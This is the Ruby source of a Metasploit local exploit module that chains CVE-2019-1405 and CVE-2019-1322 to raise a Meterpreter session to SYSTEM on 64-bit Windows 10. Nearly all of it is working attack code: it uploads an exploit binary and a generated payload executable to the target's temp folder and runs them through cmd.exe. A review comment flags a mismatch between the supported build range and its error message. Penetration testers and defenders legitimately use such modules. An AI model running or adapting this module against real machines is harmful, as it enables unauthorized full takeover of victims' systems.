Path: blob/master/modules/exploits/windows/local/comahawk.rb
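##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft UPnP Local Privilege Elevation Vulnerability',
        'Description' => %q{
          This exploit uses two vulnerabilities to execute a command as an elevated user.
          The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to
          NT AUTHORITY\LOCAL SERVICE
          The second (CVE-2019-1322) leverages the Update Orchestrator Service to
          elevate from NT AUTHORITY\LOCAL SERVICE to NT AUTHORITY\SYSTEM.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'NCC Group', # Original discovery (https://www.nccgroup.trust/uk/)
          'hoangprod', # PoC
          'bwatters-r7' # msf module
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Targets' => [
          ['Windows x64', { 'Arch' => ARCH_X64 }]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2019-11-12',
        'References' => [
          ['CVE', '2019-1322'],
          ['CVE', '2019-1405'],
          ['EDB', '47684'],
          ['URL', 'https://github.com/apt69/COMahawk'],
          ['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/'],
          ['URL', 'https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1']
        ],
        'DefaultOptions' => {
          'DisablePayloadHandler' => false
        },
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_sys_config_getenv
            ]
          }
        }
      )
    )

    # EXPLOIT_TIMEOUT and EXECUTE_DELAY are both honoured by #exploit below;
    # the earlier version registered them but never read them.
    register_options([
      OptString.new('EXPLOIT_NAME',
                    [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),
      OptString.new('PAYLOAD_NAME',
                    [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
      OptString.new('WRITABLE_DIR',
                    [false, 'Path to write binaries (%TEMP% by default).', nil]),
      OptInt.new('EXPLOIT_TIMEOUT',
                 [true, 'The number of seconds to wait for exploit to finish running', 60]),
      OptInt.new('EXECUTE_DELAY',
                 [true, 'The number of seconds to delay between file upload and exploit launch', 3])
    ])
  end

  # Main entry point: resolves file names and the writable directory from the
  # datastore, validates the session and target, uploads the bundled exploit
  # binary and the generated payload, runs the exploit and removes the exploit
  # binary afterwards. The payload is intentionally left on disk (see the
  # print_warning below), because the elevated process may still be using it.
  def exploit
    exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha(6..14)
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(6..14)
    exploit_name = "#{exploit_name}.exe" unless exploit_name.end_with?('.exe')
    payload_name = "#{payload_name}.exe" unless payload_name.end_with?('.exe')
    temp_path = datastore['WRITABLE_DIR'] || session.sys.config.getenv('TEMP')
    # getenv may come back empty on an unusual session; fail early instead of
    # building paths like "\\name.exe" and failing later with a confusing error.
    if temp_path.nil? || temp_path.empty?
      fail_with(Failure::BadConfig, 'Could not determine a writable directory; set WRITABLE_DIR')
    end
    payload_path = "#{temp_path}\\#{payload_name}"
    exploit_path = "#{temp_path}\\#{exploit_name}"
    payload_exe = generate_payload_exe

    # Check target
    vprint_status('Checking Target')
    validate_active_host
    validate_target
    fail_with(Failure::BadConfig, "#{temp_path} does not exist on the target") unless directory?(temp_path)

    # Upload Exploit
    vprint_status("Uploading exploit to #{sysinfo['Computer']} as #{exploit_path}")
    ensure_clean_destination(exploit_path)
    exploit_bin = exploit_data('cve-2019-1322', 'CVE-2019-1322-EXE.exe')
    write_file(exploit_path, exploit_bin)
    print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")

    # Upload Payload
    vprint_status('Uploading Payload')
    ensure_clean_destination(payload_path)
    write_file(payload_path, payload_exe)
    print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
    print_warning("This exploit requires manual cleanup of the payload #{payload_path}")

    # Run Exploit
    # Honour EXECUTE_DELAY as documented in register_options (delay between
    # upload and launch); a zero value skips the wait.
    execute_delay = datastore['EXECUTE_DELAY'].to_i
    if execute_delay.positive?
      vprint_status("Waiting #{execute_delay} seconds before launching the exploit")
      sleep(execute_delay)
    end
    vprint_status('Running Exploit')
    print_status('It may take a moment after the session is established for the exploit to exit safely.')
    begin
      # Timeout comes from EXPLOIT_TIMEOUT rather than a hard-coded 60 so the
      # option actually controls how long cmd_exec waits.
      cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}", datastore['EXPLOIT_TIMEOUT'])
    rescue Rex::TimeoutError => e
      elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)
      print_error('Caught timeout. Exploit may be taking longer or it may have failed.')
    end
    vprint_status("Cleaning up #{exploit_path}")
    ensure_clean_destination(exploit_path)
  end

  # Confirms the session can still answer a sysinfo request. Any
  # RequestError is logged and converted into Msf::Exploit::Failed so the
  # framework reports a failed run instead of an unhandled exception.
  def validate_active_host
    print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
  rescue Rex::Post::Meterpreter::RequestError => e
    elog('Could not connect to session', error: e)
    raise Msf::Exploit::Failed, 'Could not connect to session'
  end

  # Rejects 32-bit sessions and Windows builds outside the supported range.
  # Both checks call fail_with, which aborts the module run.
  def validate_target
    if sysinfo['Architecture'] == ARCH_X86
      fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
    end
    version = get_version_info
    vprint_status("OS version: #{version}")
    # NOTE(review): the constant range below is Win10_1803..Win10_1809 while the
    # message quotes builds 17133-18362 — confirm which range is intended and
    # make the two agree.
    unless version.build_number.between?(Msf::WindowsVersion::Win10_1803, Msf::WindowsVersion::Win10_1809)
      fail_with(Failure::NotVulnerable, 'The exploit only supports Windows 10 build versions 17133-18362')
    end
  end

  # Deletes `path` on the target if a file already exists there, so a stale
  # binary from a previous run is never executed or left behind. A failed
  # delete is logged and reported but does not abort the run.
  #
  # @param path [String] remote path to clear
  def ensure_clean_destination(path)
    return unless file?(path)

    print_status("#{path} already exists on the target. Deleting...")
    begin
      file_rm(path)
      print_status("Deleted #{path}")
    rescue Rex::Post::Meterpreter::RequestError => e
      # Same elog shape as the other rescue blocks in this module.
      elog("Unable to delete #{path}", error: e)
      print_error("Unable to delete #{path}")
    end
  end
end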